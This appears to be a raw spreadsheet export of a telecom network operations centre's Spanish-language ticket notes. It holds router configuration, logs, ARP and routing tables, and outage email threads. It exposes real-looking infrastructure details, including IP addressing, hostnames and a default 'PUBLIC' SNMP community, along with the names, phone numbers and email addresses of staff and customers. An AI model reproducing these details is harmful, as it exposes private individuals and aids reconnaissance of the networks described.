 SPEED AUTO
!
INTERFACE GIGABITETHERNET1.460
 DESCRIPTION /_/1017843/_/IN01MB_NCIC-ELPORVENIR_EPR01
 ENCAPSULATION DOT1Q 460
 IP ADDRESS 10.1.201.114 255.255.255.248
 RATE-LIMIT INPUT 1024000 192000 384000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 1024000 192000 384000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
INTERFACE GIGABITETHERNET1.2190
 DESCRIPTION WAN_GESTION
 ENCAPSULATION DOT1Q 2190
 IP ADDRESS 10.81.31.36 255.255.255.240
!
INTERFACE VLAN1
 DESCRIPTION BLOQUE PUBLICO
 IP ADDRESS 181.115.18.73 255.255.255.248
 IP FLOW INGRESS
 IP FLOW EGRESS
 LOAD-INTERVAL 30
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
!
IP ROUTE 0.0.0.0 0.0.0.0 10.1.201.113 NAME DEFAULT
IP ROUTE 10.31.210.16 255.255.255.248 10.81.31.33 NAME SS_GT
IP ROUTE 10.33.2.0 255.255.255.0 10.81.31.33 NAME GESTION_SOLAR
IP ROUTE 10.195.4.79 255.255.255.255 10.81.31.33 NAME GESTION_TGU
IP ROUTE 10.195.14.47 255.255.255.255 10.81.33.33 NAME GESTION_SPS
!
MAC-ADDRESS-TABLE AGING-TIME 15
!
SNMP-SERVER COMMUNITY PUBLIC RO
!
LINE CON 0
 LOGIN LOCAL
 NO MODEM ENABLE
LINE AUX 0
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 37 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 37 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 41 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
*JUN 17 15:39:19.347: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*JUN 17 15:39:19.351: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*JUN 17 15:39:20.155: %LINK-3-UPDOWN: INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*JUN 17 15:39:20.155: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO DOWN
*JUN 17 15:39:20.155: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:20.403: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ONBOARD VPN, CHANGED STATE TO UP
*JUN 17 15:39:20.963: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN 17 15:39:21.595: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*JUN 17 15:39:21.595: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO DOWN
*JUN 17 15:39:21.595: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*JUN 17 15:39:23.743: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*JUN 17 15:39:25.891: %CONTROLLER-5-UPDOWN: CONTROLLER VDSL 0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 17 15:39:26.343: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN 17 15:39:28.035: %LINK-5-CHANGED: INTERFACE ETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 17 15:39:28.039: %LINK-5-CHANGED: INTERFACE ATM0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 17 15:39:28.355: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0, CHANGED STATE TO UP
*JUN 17 15:39:28.735: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:28.735: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 17 15:39:28.735: %LINK-3-UPDOWN: INTERFACE FASTETHERNET3, CHANGED STATE TO UP
*JUN 17 15:39:28.739: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 17 15:39:29.459: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:29.459: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO UP
*JUN 17 15:39:29.775: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:29.775: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 17 15:39:29.775: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET3, CHANGED STATE TO UP
*JUN 17 15:39:29.775: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUN 17 15:39:31.415: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE-ADVSECURITYK9-M), VERSION 15.3(2)T3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 05-MAR-14 05:14 BY PROD_REL_TEAM
*JUN 17 15:39:31.419: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843 IS UNDERGOING A COLD START
*JUN 17 15:39:31.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:31.555: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUN 17 15:39:42.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUN 17 15:39:43.431: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUN 17 15:39:50.431: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:51.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*JUN 17 15:39:59.039: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN 21 21:41:10.102: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLARO ON VTY1 (10.1.201.117)
*JUN 21 22:14:21.878: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLARO ON VTY1 (10.31.210.19)
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
SHOW CLOCK
*23:32:32.098 UTC TUE JUN 21 2022
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.1.201.113            0   0000.5E00.0105  ARPA   GIGABITETHERNET1.460
INTERNET  10.1.201.114            -   2C31.2453.98B5  ARPA   GIGABITETHERNET1.460
INTERNET  10.1.201.117           11   183D.5E29.6805  ARPA   GIGABITETHERNET1.460
INTERNET  10.1.201.118           10   505D.AC64.7F35  ARPA   GIGABITETHERNET1.460
INTERNET  10.81.31.33             0   0000.5E00.0105  ARPA   GIGABITETHERNET1.2190
INTERNET  10.81.31.34             6   0A00.3ED2.FE09  ARPA   GIGABITETHERNET1.2190
INTERNET  10.81.31.35            82   0A00.3EDD.1F0C  ARPA   GIGABITETHERNET1.2190
INTERNET  10.81.31.36             -   2C31.2453.98B5  ARPA   GIGABITETHERNET1.2190
INTERNET  10.81.31.45             9   183D.5E29.6805  ARPA   GIGABITETHERNET1.2190
INTERNET  10.81.31.46             9   505D.AC64.7F35  ARPA   GIGABITETHERNET1.2190
INTERNET  181.115.18.73           -   2C31.2453.98B0  ARPA   VLAN1
INTERNET  181.115.18.74           0   00A0.C89E.5DA8  ARPA   VLAN1
INTERNET  181.115.18.75           1   00A0.C852.6B20  ARPA   VLAN1
INTERNET  181.115.18.76           0   000B.82A4.625F  ARPA   VLAN1
INTERNET  181.115.18.77           0   C074.AD21.5F6B  ARPA   VLAN1
INTERNET  181.115.18.78           0   INCOMPLETE      ARPA
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            UP             UP
FA1                            UP             UP
FA2                            UP             UP
FA3                            UP             UP
GI0                            DOWN           DOWN
GI1                            UP             UP
GI1.460                        UP             UP       /_/1017843/_/IN01MB_NCIC-ELPORVENIR_EPR01
GI1.2190                       UP             UP       WAN_GESTION
VL1                            UP             UP       BLOQUE PUBLICO
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
ETHERNET0                  UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET1              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET2              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET3              UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET1           UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET1.460       10.1.201.114    YES NVRAM  UP                    UP
GIGABITETHERNET1.2190      10.81.31.36     YES NVRAM  UP                    UP
VLAN1                      181.115.18.73   YES NVRAM  UP                    UP
CSC867_IN01MB_NCIC-ELPORVENIR_EPR01_1017843#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 10.1.201.114
  PING 10.1.201.114: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.1.201.114 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/11/35 MS
RUTA IP:
PE: 10.179.32.15
DISPLAY IP ROUTING-TABLE 10.1.201.114
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : _PUBLIC_
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.1.201.114/32  DIRECT  0    0                 0.0.0.0         VLANIF460			</t>
  </si>
  <si>
    <t>SE TIENE EN SEGUIMIENTO POR VISITA SE PROCEDE A DEJAR HEREDADO</t>
  </si>
  <si>
    <t>F4611327</t>
  </si>
  <si>
    <t>***--- CL PIDE AVANCES Y SE LE NOTIFICA DE LA VISITA COORDINADA PARA HOY A LAS 08:00 HRS --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 05:30
PARA: SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA CHOLOMA ID: 619336
BUENOS DÍAS ESTIMADO SR. ORELLANA.
                ACTUALMENTE SE TIENE VISITA COORDINADA A LA TIENDA A LAS 08:00 HRS.
ESPERAMOS CONTAR CON AVANCES DEL PERSONAL DE CAMPO A PARTIR DE ESE HORARIO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SAUL ORELLANA (VENDOR) [MAILTO:SAUL.ORELLANA0@WALMART.COM]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 05:24
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA CHOLOMA ID: 619336
BUENOS DÍAS, NOS PODRÍAN INDICAR EL ULTIMO AVANCE DE ESTE TICKET.
GRACIAS Y SALUDOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JEFFERSON ARCE AL 22437253 NO CONTESTA OPERADORA INDICA QUE TODOS LOS AGENTES ESTAN OCUPADOS **
-ID 1001556456
**</t>
  </si>
  <si>
    <t>F4611344</t>
  </si>
  <si>
    <t>###SE CONFIRMA CON CLIENTE EDGAR RECINOS QUE EL ENLACE OPERATIVO Y SE PUEDE DAR CIERRE DE TICKET##
1001570777
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 58567803
NÚMERO: 58567803
DURACIÓN: 0:21:33
ESTADO: ACD - ASIGNADO A: VELDIN.PALENCIA
DETALLES: 58567803
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 22/06/2022 09:21:24</t>
  </si>
  <si>
    <t>F4611361</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DONALD   AL 505-8-2070642 NORESPONDE || SE INTENTARA LUEGO **
-ID 1001563427
**</t>
  </si>
  <si>
    <t>-* SE HABLA CON EMILIO AGUILAR (CLIENTE) INFORMA QUE TIENE EN LINEA A PERSONAL DEL PR, SE INTENTA REALIZAR CONFERENCIA CON PERSONAL DE CNOC ANTES DE ESTO CLIENTE CORTA LLAMADA, SE SOLICITA APOYO A GESTOR EN CONTACTAR NUEVAMENTE A CLIENTE -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DONALD   AL 505-8-2070642 SE INTENTA CONTACTAR A CLIENTE NUEVAMENTE NO RESPONDE || A ESPERA QUE BRINDEN OTRO CONTACTO O SE INTENTARA LUEGO **
-ID 1001589156
**</t>
  </si>
  <si>
    <t>***--- CL COMPARTE CONTACTO LOCAL Y HORARIO --***
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 03:11
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; YAÑEZ FRAGA RODRIGO MARTIN &lt;RYFRAGA@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4642346::: TICKET CNOC IMDHE020895::: "LINK DOWN"
ESTIMADOS,
NOS COMUNICAMOS CON LCON CABALLERO DONALD  505-8-2070642, NOS INDICA QUE EN ESTE MOMENTO NO SE ENCUENTRA NADIE EN SITIO, SOLICITA LLAMAR DESPUÉS DE LAS 8:00 HRS LT.
BEST REGARDS | SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4611394</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE MANUEL GONZALEZ PERO NO CONTESTA.
1001537586,1001537650.
COLA:
NOMBRE: A: 50190497
NÚMERO: 50190497
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 50190497
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 21/06/2022 19:57:43</t>
  </si>
  <si>
    <t>SE VERIFICA QUE EL NUMERO QUE ESTA AFECTADO ES EL 23816565 CON EL ID 365700002.</t>
  </si>
  <si>
    <t>F4611441</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE ENVÍA IMAGEN INDICANDO QUE EL SERVICIO SE ENCUENTRA CAÍDO, SE LE INDICA QUE CNOC RESPONDERÁ*/*/*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 17:23
PARA: LESTER IVAN KROLIK MORALES &lt;LESTER.KROLIK@SOMOSCMI.COM&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOC EMPRESAS &lt;SOCEMPRESAS@CLARO.COM.GT&gt;
CC: CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE MPLS C646 ID 625900035T
BUENAS TARDES LESTER,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-------------------------------------------
BUENA TARDE ESTIMADOS,
AÚN SE OBSERVA EL ENLACE CAÍDO:
SALUDOS CORDIALES,</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA DESCARTAR TEMAS DE MANTENIMIENTO O PROBLEMAS DE ENERGIA || DESPUES DE REALIZAR PRUEBAS DE PRIMER NIVEL CON CLIENTE EN HORARIO HABIL SI FUERA NECESARIO SE ESCALARA A UFINET YA QUE ENLACE ES RESPONSABILIDA DE DICHO PROVEEDOR.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 21 DE JUNIO DE 2022 21:01PARA: HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK02@CAMPERO.COM &lt;HELPDESK02@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CAMPERO_GT_C64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1441
ID: 625900035T
IDENTIFICADOR DEL CLIENTE:  CC_CAMPERO_GT_C646
UBICADO EN:  646, 2 AVENIDA 7-35 ZONA 1 SANTA CRUZ DEL QUICHE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE ESCRIBE REPORTANDO CAÍDA TOTAL*/*/*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 10:30
PARA: LESTER IVAN KROLIK MORALES &lt;LESTER.KROLIK@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOC EMPRESAS &lt;SOCEMPRESAS@CLARO.COM.GT&gt;
CC: CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE MPLS C646 ID 625900035T
BUENOS DÍAS LESTER,
            LAMENTAMOS LOS INCONVENIENTES, HEMOS GENERADO EL TICKET SD1137560 PARA LA VERIFICACIÓN DE SU SERVICIO, AL CONTAR CON AVANCES LE NOTIFICAREMOS.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
------------------------
DE: LESTER IVAN KROLIK MORALES [MAILTO:LESTER.KROLIK@SOMOSCMI.COM]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 10:21
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOC EMPRESAS &lt;SOCEMPRESAS@CLARO.COM.GT&gt;
CC: CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;
ASUNTO: FALLA ENLACE MPLS C646 ID 625900035T
BUEN DÍA ESTIMADOS,
SOLICITO DE SU APOYO VALIDANDO EL ENLACE DEL PDV C646 ID 625900035T YA QUE SE OBSERVA CAÍDO, ADJUNTO CAPTURA:
DE ANTEMANO, AGRADEZCO EL APOYO BRINDADO.
SALUDOS CORDIALES,</t>
  </si>
  <si>
    <t>F4611464</t>
  </si>
  <si>
    <t>EL ENLACE SE ENCUENTRA OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PIN  -VP TRANSFERENCIAS 10.218.51.135
  PING 10.218.51.135: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.51.135: BYTES=56 SEQUENCE=1 TTL=58 TIME=55 MS
    REPLY FROM 10.218.51.135: BYTES=56 SEQUENCE=2 TTL=58 TIME=60 MS
    REPLY FROM 10.218.51.135: BYTES=56 SEQUENCE=3 TTL=58 TIME=61 MS
    REPLY FROM 10.218.51.135: BYTES=56 SEQUENCE=4 TTL=58 TIME=59 MS
    REPLY FROM 10.218.51.135: BYTES=56 SEQUENCE=5 TTL=58 TIME=56 MS
  --- 10.218.51.135 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 55/58/61 MS
&lt;GNCYGTG2N2D4A05A15EIM10&gt;
PE 10.179.28.50
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS IP ROUTING-TABLE VP TRANSFERENCIAS 10.218.51.135
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.218.48.0/21  STATIC  1    0             RD  10.174.203.36   VLANIF3235
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS CUR INTE VLANIF3235
#
INTERFACE VLANIF3235
 DESCRIPTION TRANSFERENCIAS
 IP BINDING VPN-INSTANCE TRANSFERENCIAS
 IP ADDRESS 10.174.203.35 255.255.255.248
 VRRP VRID 1 VIRTUAL-IP 10.174.203.33
#
RETURN</t>
  </si>
  <si>
    <t>F4611496</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HECTOR CALDERON 56980893 MENCIONA QUE EL ID QUE NECESITABAN REPORTAR ES 302400004T
CLIENTE CONFIRMA QUE ESTE SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001685929</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE HECTOR CALDERON AL 56980893  SOLICITA QUE SE LE LLAME A LAS 14:00 HRS YA QUE AHORITA INDICA QUE NO ESTA EN EL LUGAR  **
-ID 1001574749
**</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE HECTOR CALDERON AL 56980893  NO RESPONDE | SE INTENTARA LUEGO YA QUE CLIENTE AUN NO RESPONDE CORREO **
-ID 1001551565
**</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  JOSE ROBERTO CAS 56980958 / UNICO PARA VALIDAR NO SE TIENE RESPUESTA  SE LLAMARA LUEGO</t>
  </si>
  <si>
    <t>SE VALIDO EN EL DIAGNOSTICO QUE EL INCONVENIENTE FUE DENTRO DE SU RED INTERNA SE PROCEDE A VALIDAR CON EL CLIENTE
*JUN 17 01:57:19.199 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 17 01:57:20.199 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
JUN 21 21:07:27.374 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 21 21:07:28.374 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
.JUN 21 21:08:03.381 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
.JUN 21 21:08:06.373 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
.JUN 21 21:08:14.373 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
.JUN 21 21:08:15.373 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
CC_SERVICIOS_CAMBIARIOS_GT_INTERNET_ZONA_13#
SHOW CLOCK
21:45:45.769 GUA TUE JUN 21 2022
CC_SERVICIOS_CAMBIARIOS_GT_INTERNET_ZONA_13#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/302400001T/_/
GI0/1                          ADMIN DOWN     DOWN
GI0/0/0                        UP             UP       LAN DEL CLIENTE
GI0/0/1                        UP             UP       LAN DEL CLIENTE
GI0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
NV0                            UP             UP
VL1                            UP             UP       LAN DEL CLIENTE
CC_SERVICIOS_CAMBIARIOS_GT_INTERNET_ZONA_13#</t>
  </si>
  <si>
    <t>F4611517</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 4 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
